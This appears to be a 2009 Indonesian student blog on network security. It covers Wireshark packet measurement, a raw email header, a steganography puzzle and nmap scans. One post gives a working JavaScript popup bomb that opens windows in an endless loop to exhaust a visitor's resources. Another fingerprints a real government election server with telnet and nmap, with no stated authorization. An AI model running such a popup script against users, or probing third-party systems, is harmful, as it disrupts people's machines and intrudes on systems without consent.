h1

Email Packet Measurement

May 11, 2009

Untuk dapat mengetahui jumlah paket rata-rata yang digunakan untuk mengirim sebuah email, maka digunakan sebuah software Protocol Analyzer yaitu Wireshark. Tampillan awal dari software ini adalah sebagai berikut:

menu_edit

Sebelum melakukan pengukuran, pertama kali harus melakukan setting interface yang akan diukur. Pilih tab Capture kemudian interface, setelah itu pilih interface yang akan diukur seperti yang terlihat pada gambar di bawah ini:

interface_list

Setelah itu klik ikon “stop the running life capture” untuk membatasi rentang jumlah paket yang akan diukur. Kemudian untuk melihat hasil pengukuran klik tab Statistic kemudian pilih Summary dan hasilnya adalah sebagai berikut:

statistik

Dari hasil pengukuran didapat rata-rata ukuran paket 344.080 bytes

h1

PopUp Recursive

April 27, 2009

Untuk dapat melakukan serangan pada sisi client dengan membuka windows baru yang sama secara berulang-ulang yang dapat menghabiskan resource memory dan bandwith dapat meggunakan javascript, yang scriptnya adalah sebagai berikut:
<script language=”JavaScript”>

function open_new_windows() {
var x = 50;y = 50;

myWindow9 = window.open(location.href,’myPopup’,’width=200,height=200′);

for(;;){
alert(‘Awas hati-hati’);
myWindow9.document.write(‘x ‘ + x +’, y = ‘+y);
myWindow9 = window.open(location.href,”,’width=300,height=200,left=’+x+’,top=’+y+”);
x = x+100;
y = y+50;
}
}

</script>

</head>
<body>
<form>
<input type=”button” value=”Klik Di sini” onClick=”open_new_windows()” />
</form>
</body>
</html>

Hasil dari script tersebut bila dijalankan akan seperti gambar di bawah.

Bila tombol Ok atau tanda silang(x) diklik, maka akan dibuka windows baru yang sama secara terus-menerus.

hasilpopup

h1

Probing www.kpu.go.id

April 20, 2009

Untuk mengetahui informasi mengenai webserver yang digunakan oleh KPU, pertama kali adalah dengan melakukan testing koneksi dengan ke http://www.kpu .go.id d, hasilnya adalah sebagai berikut:

ping_kpu

Dari hasil ping yang dilakukan, diketahui bahwa ip address dari www.kpu.go.id adalah 203.130.201.130 dan respon yang dihasilkan adalah request time out, hal ini berarti bahwa protokol ICMP yang digunakan untuk melakukan ping diblok oleh firewall.

Kemudian untuk mengetahui web server yang digunakan adalah dengan melakukan telnet ke port webserver yaitu port 80. Setelah koneksi telnet ke web server berhasil dilakukan, maka selanjutnya adalah dengan melakukan perintah GET/ caleg.html (nama file yang digunakan bebas, yang penting tidak terdapat di web server). Kemudian web server kpu akan merespon dengan pesan Bad Request 400, yang berarti halaman html yang bersangkutan tidak ada, tetapi dari respon web server tersebut dapat diketahui bahwa web server yang digunakan adalah nginx 06.35. Berikut ini adalah hasil tampilan dari proses telnet ke web server kpu:

========================================

yonatan@ubuntu:~ telnet http://www.kpu.go.id 80
Trying 203.130.201.130…
Connected to http://www.kpu.go.id.
Escape character is ‘^]’.
GET/ PEMILU.HTML
<html>
<head><title>400 Bad Request</title></head>
<body bgcolor=”white”>
<center><h1>400 Bad Request</h1></center>
<hr><center>nginx/0.6.35</center>
</body>
</html>
Connection closed by foreign host.
========================================

Selanjutnya untuk mengetahui server yang digunakan oleh kpu, digunakan tools nmap

Dengan menggunakan perintah nmap -A http://www.kpu.go.id –PN.

Dari hasil yang didapat maka dapat disimpulkan bahwa 98% KPU menggunakan server FreeBSD 6.2-Release. Berikut ini adalah tampilan dari proses nmap:

=====================================================

yonatan@ubuntu:~ nmap -A http://www.kpu.go.id -PN

Starting Nmap 4.62 ( http://nmap.org ) at 2009-04-16 17:45 WIT
Insufficient responses for TCP sequencing (3), OS detection may be less accurate
LUA INTERPRETER in nse_init.cc:763: /usr/share/nmap/scripts/robots.nse:4: module ‘http’ not found:
no field package.preload[‘http’]
no file ‘/usr/share/nmap/nselib/http.lua’
no file ‘./http.lua’
no file ‘/usr/local/share/lua/5.1/http.lua’
no file ‘/usr/local/share/lua/5.1/http/init.lua’
no file ‘/usr/local/lib/lua/5.1/http.lua’
no file ‘/usr/local/lib/lua/5.1/http/init.lua’
no file ‘/usr/lib/nmap/nselib-bin/http.so’
no file ‘./http.so’
no file ‘/usr/local/lib/lua/5.1/http.so’
no file ‘/usr/local/lib/lua/5.1/loadall.so’
SCRIPT ENGINE: Aborting script scan.
Interesting ports on http://www.kpu.go.id (203.130.201.130):
Not shown: 1714 filtered ports
PORT   STATE SERVICE    VERSION
80/tcp open  http-proxy nginx http proxy 0.6.35
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running (JUST GUESSING) : FreeBSD 6.X (98%)
Aggressive OS guesses: FreeBSD 6.2-RELEASE (98%)
No exact OS matches for host (test conditions non-ideal).

TRACEROUTE (using port 80/tcp)
HOP RTT    ADDRESS
1   0.50   mygateway1.ar7 (192.168.1.1)
2   483.20 1.subnet125-163-64.speedy.telkom.net.id (125.163.64.1)
3   254.24 125.160.0.141
4   267.26 192.168.74.206
5   …
6   479.91 http://www.kpu.go.id (203.130.201.130)

OS and Service detection performed. Please report any incorrect results at http://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 190.536 seconds

h1

Mail Header

April 13, 2009

Email yang memiliki dua buah attachment file yaitu file ataach1.txt dan ataach2.txt dikirimkan dari yon_htm@yahoo.com ke linchuss@gmil.com. Bila headernya dilihat maka hasilnya adalah sebagai berikut: (text yang dicetak tebal menunjukkan bagian kode yang merepresentasikan file attachment)

Delivered-To: linchuss@gmail.com

Received: by 10.239.148.76 with SMTP id e12cs93638hbb;

Sun, 12 Apr 2009 21:58:19 -0700 (PDT)

Received: by 10.141.201.1 with SMTP id d1mr2591983rvq.230.1239598698149;

Sun, 12 Apr 2009 21:58:18 -0700 (PDT)

Return-Path: <yon_htm@yahoo.com>

Received: from n55.bullet.mail.sp1.yahoo.com (n55.bullet.mail.sp1.yahoo.com [98.136.44.188])

by mx.google.com with SMTP id g14si3569924rvb.47.2009.04.12.21.58.16;

Sun, 12 Apr 2009 21:58:17 -0700 (PDT)

Received-SPF: pass (google.com: domain of yon_htm@yahoo.com designates 98.136.44.188 as permitted sender) client-ip=98.136.44.188;

Authentication-Results: mx.google.com; spf=pass (google.com: domain of yon_htm@yahoo.com designates 98.136.44.188 as permitted sender) smtp.mail=yon_htm@yahoo.com; dkim=pass (test mode) header.i=@yahoo.com

Received: from [216.252.122.219] by n55.bullet.mail.sp1.yahoo.com with NNFMP; 13 Apr 2009 04:58:16 -0000

Received: from [68.142.194.243] by t4.bullet.sp1.yahoo.com with NNFMP; 13 Apr 2009 04:58:16 -0000

Received: from [68.142.201.242] by t1.bullet.mud.yahoo.com with NNFMP; 13 Apr 2009 04:58:15 -0000

Received: from [127.0.0.1] by omp403.mail.mud.yahoo.com with NNFMP; 13 Apr 2009 04:58:15 -0000

X-Yahoo-Newman-Property: ymail-3

X-Yahoo-Newman-Id: 897030.63291.bm@omp403.mail.mud.yahoo.com

Received: (qmail 66279 invoked by uid 60001); 13 Apr 2009 04:58:15 -0000

DKIM-Signature: v=1; a=rsa-sha256; c=relaxed/relaxed; d=yahoo.com; s=s1024; t=1239598695; bh=/765LA+JJ+37+nEzfdgPamhgCjcsqk+0nzSEIf0JmqM=; h=Message-ID:X-YMail-OSG:Received:X-Mailer:Date:From:Subject:To:MIME-Version:Content-Type; b=EJ1K5E+HTBKIsoZeOKZPWxJogSGW29SwoJ8fX2Q1kupN14Ji8Nqk3KxRF83+O04iDAnahDhxATdVrgaFwNWAFodYYSeif0HFu+fGkqNk6OPCUlGi3nWIV+lqUEIm9YE+7LkdEb/6MKDEQaO35roYGADUHBOHcvkr33kZ8kSCEpY=

DomainKey-Signature:a=rsa-sha1; q=dns; c=nofws;

s=s1024; d=yahoo.com;

h=Message-ID:X-YMail-OSG:Received:X-Mailer:Date:From:Subject:To:MIME-Version:Content-Type;

b=VcHi+C4QAundXB9Guw0+m6A0v6ArE0+3QsUIGGZUj1Qk/OaCrtI+/fAc99cElCw6N/uChM10EfqQqE0GNuwolqQhchjVxTnjzEsbecr4vu1hGisEYFGI099FfWhwfaw9D0ESa2pf+jIhMq9d6KwEVbiPd3L4NplplBZSulvp17E=;

Message-ID: <272412.65285.qm@web46213.mail.sp1.yahoo.com>

X-YMail-OSG: 710.PncVM1mPqVe5XjEKP1_FZgq0mj3AvCi4VNuEOhfIRfZLyyrIuXO22vGBQ8QW1nfQ6oTcntzYX9y61uja7ODWRaB1KuOcKt9xTLniEXj9ypWmSOt4R1tJa75apgDZ9deiRSKB.HCmrusOrDGzOWVUl3cfZ2HWIEkRryMuOM36O05IzOMQWUIaWaW3myPBtYSjo5XeZfwI6qrWDa19OVthb8UfgDkmxSt6.qcWC7UcH43M8xyeLF9R6RFPfh3tHqktmhvl

Received: from [114.121.89.146] by web46213.mail.sp1.yahoo.com via HTTP; Sun, 12 Apr 2009 21:58:15 PDT

X-Mailer: YahooMailWebService/0.7.289.1

Date: Sun, 12 Apr 2009 21:58:15 -0700 (PDT)

From: Yonatan Htama <yon_htm@yahoo.com>

Subject: test

To: linchuss@gmail.com

MIME-Version: 1.0

Content-Type: multipart/mixed; boundary=”0-1935579188-1239598695=:65285″

–0-1935579188-1239598695=:65285

Content-Type: multipart/alternative; boundary=”0-671998023-1239598695=:65285″

–0-671998023-1239598695=:65285

Content-Type: text/plain; charset=us-ascii

–0-671998023-1239598695=:65285

Content-Type: text/html; charset=us-ascii

<table cellspacing=”0″ cellpadding=”0″ border=”0″ ><tr><td valign=”top” style=”font: inherit;”><br></td></tr></table><br>

–0-671998023-1239598695=:65285–

–0-1935579188-1239598695=:65285

Content-Type: text/plain; name=”ataach1.txt”

Content-Transfer-Encoding: base64

Content-Disposition: attachment; filename=”ataach1.txt”

YXR0YWNoMQ==

–0-1935579188-1239598695=:65285

Content-Type: text/plain; name=”ataach2.txt”

Content-Transfer-Encoding: base64

Content-Disposition: attachment; filename=”ataach2.txt”

YXR0YWNoMg==

–0-1935579188-1239598695=:65285–

h1

Solution Catur Jawa Steganography

April 6, 2009

Solusi untuk steganography catur jawa adalah kombinasi dari 5 buah bit biner (2^5=32 kombinasi) yang dipetakan ke dalam huruf a sampai z (26 buah), sedangkan untuk sisa kombinasinya dianggap null(tidak memiliki nilai apa-apa). Untuk merepresentasikan bit 0 digunakan simbol o dan untuk bit 1 digunakan simbol x. Untuk lebih lengkapnya dapat dilihat pada tabel di bawah ini:

sol_stegano

Jadi solusi untuk steganography catur jawa adalah kebon bibit

h1

“CATUR JAWA” STEGANOGRAPHY

March 30, 2009

Catur jawa adalah suatu permainan yang sudah cukup lama dimainkan oleh semua orang baik tua maupun muda. Prinsip dari permainan ini adalah membentuk suatu diagonal dari  5 buah simbol yang sama dan berurutan  (dalam hal ini x dan o). Dalam permainan catur jawa ini kita bisa menyimpan/menyisipkan sebuah pesan di dalam simbol-simbol tadi. Coba cari pesan yang terdapat pada hasil dari permainan catur jawa di bawah ini:

catur_jawa3

h1

Port Scanning dengan NMAP

March 23, 2009

Proses Scanning  dilakukan dengan menggunakan tools Nmap-ZenMap Gui versi Windows. Nmap versi Windows memiliki keterbatasan tidak dapat melakukan proses scanning untuk dirinya sendiri (loalhost), sehingga proses scanning dilakukan dengan melakukan Port Scanning pada software VMWare yang diinstall Sistem Operasi Linux Ubuntu. Alamat Ip untuk VMWare adalah 192.168.11.128. Hasil keluaran proses Scanning dengan menggunakan Nmap adalah sebagai berikut:

 

Starting Nmap 4.76 ( http://nmap.org ) at 2008-03-24 16:48 SE Asia Standard Time

Initiating ARP Ping Scan at 16:48

Scanning 192.168.11.128 [1 port]

Completed ARP Ping Scan at 16:48, 0.58s elapsed (1 total hosts)

Initiating Parallel DNS resolution of 1 host. at 16:48

Completed Parallel DNS resolution of 1 host. at 16:49, 16.52s elapsed

Initiating SYN Stealth Scan at 16:49

Scanning 192.168.11.128 [65535 ports]

Discovered open port 443/tcp on 192.168.11.128

Discovered open port 80/tcp on 192.168.11.128

Discovered open port 21/tcp on 192.168.11.128

Discovered open port 3306/tcp on 192.168.11.128

Completed SYN Stealth Scan at 16:49, 3.14s elapsed (65535 total ports)

Initiating Service scan at 16:49

Scanning 4 services on 192.168.11.128

Completed Service scan at 16:49, 13.44s elapsed (4 services on 1 host)

Initiating OS detection (try #1) against 192.168.11.128

Retrying OS detection (try #2) against 192.168.11.128

Retrying OS detection (try #3) against 192.168.11.128

Retrying OS detection (try #4) against 192.168.11.128

Retrying OS detection (try #5) against 192.168.11.128

SCRIPT ENGINE: Initiating script scanning.

Initiating SCRIPT ENGINE at 16:49

Completed SCRIPT ENGINE at 16:49, 5.47s elapsed

Host 192.168.11.128 appears to be up … good.

Interesting ports on 192.168.11.128:

Not shown: 65531 closed ports

PORT     STATE SERVICE  VERSION

21/tcp   open  ftp      ProFTPD 1.3.1

80/tcp   open  http     Apache httpd 2.2.9 ((Unix) DAV/2 mod_ssl/2.2.9 OpenSSL/0.9.8h PHP/5.2.6 mod_apreq2-20051231/2.6.0 mod_perl/2.0.4 Perl/v5.10.0)

|_ HTML title: Site doesn’t have a title.

443/tcp  open  ssl/http Apache httpd 2.2.9 ((Unix) DAV/2 mod_ssl/2.2.9 OpenSSL/0.9.8h PHP/5.2.6 mod_apreq2-20051231/2.6.0 mod_perl/2.0.4 Perl/v5.10.0)

|_ SSLv2: server still supports SSLv2

|_ HTML title: Site doesn’t have a title.

3306/tcp open  mysql    MySQL (unauthorized)

MAC Address: 00:0C:29:D4:CC:B8 (VMware)

No exact OS matches for host (If you know what OS is running on it, see http://nmap.org/submit/ ).

TCP/IP fingerprint:

OS:SCAN(V=4.76%D=3/24%OT=21%CT=1%CU=33549%PV=Y%DS=1%G=Y%M=000C29%TM=47E7793

 

OS:9%P=i686-pc-windows-windows)SEQ(SP=CC%GCD=1%ISR=C9%TI=Z%II=I%TS=U)OPS(O1

OS:=M5B4NNSNW4%O2=M5B4NNSNW4%O3=M5B4NW4%O4=M5B4NNSNW4%O5=M5B4NNSNW4%O6=M5B4

OS:NNS)WIN(W1=16D0%W2=16D0%W3=16D0%W4=16D0%W5=16D0%W6=16D0)ECN(R=Y%DF=Y%TG=

OS:40%W=16D0%O=M5B4NNSNW4%CC=N%Q=)ECN(R=Y%DF=Y%T=40%W=16D0%O=M5B4NNSNW4%CC=

OS:N%Q=)T1(R=Y%DF=Y%TG=40%S=O%A=S+%F=AS%RD=0%Q=)T1(R=Y%DF=Y%T=40%S=O%A=S+%F

OS:=AS%RD=0%Q=)T2(R=N)T3(R=Y%DF=Y%TG=40%W=16D0%S=O%A=S+%F=AS%O=M5B4NNSNW4%R

OS:D=0%Q=)T3(R=Y%DF=Y%T=40%W=16D0%S=O%A=S+%F=AS%O=M5B4NNSNW4%RD=0%Q=)T4(R=Y

OS:%DF=Y%TG=40%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)T4(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%

OS:O=%RD=0%Q=)T5(R=Y%DF=Y%TG=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)T5(R=Y%DF=Y%T=

OS:40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)T6(R=Y%DF=Y%TG=40%W=0%S=A%A=Z%F=R%O=%RD=

OS:0%Q=)T6(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)T7(R=Y%DF=Y%TG=40%W=0%S

OS:=Z%A=S+%F=AR%O=%RD=0%Q=)T7(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)U1

OS:(R=N)U1(R=Y%DF=N%T=40%TOS=C0%IPL=164%UN=0%RIPL=G%RID=G%RIPCK=G%RUCK=G%RU

OS:L=G%RUD=G)IE(R=Y%DFI=N%TG=40%TOSI=S%CD=S%SI=S%DLI=S)IE(R=Y%DFI=N%T=40%TO

OS:SI=S%CD=S%SI=S%DLI=S)

Network Distance: 1 hop

TCP Sequence Prediction: Difficulty=204 (Good luck!)

IP ID Sequence Generation: All zeros

Service Info: OS: Unix

Read data files from: C:\Program Files\Nmap

OS and Service detection performed. Please report any incorrect results at http://nmap.org/submit/ .

Nmap done: 1 IP address (1 host up) scanned in 56.84 seconds

 

           Raw packets sent: 65641 (2.895MB) | Rcvd: 65621 (2.627MB)

 

 

Untuk Daftar Port yang terbuka adalah sebagai berikut:

nmap112

Hasil proses scanning untuk Sistem Operasi yang digunakan adalah sebagai berikut:

nmap121

Daftar Port dan service yang digunakan di host adalah sebagai berikut:

nmap131

Keterangan detail mengenai host yang dilakukan proses scanning

 

 

 

nmap142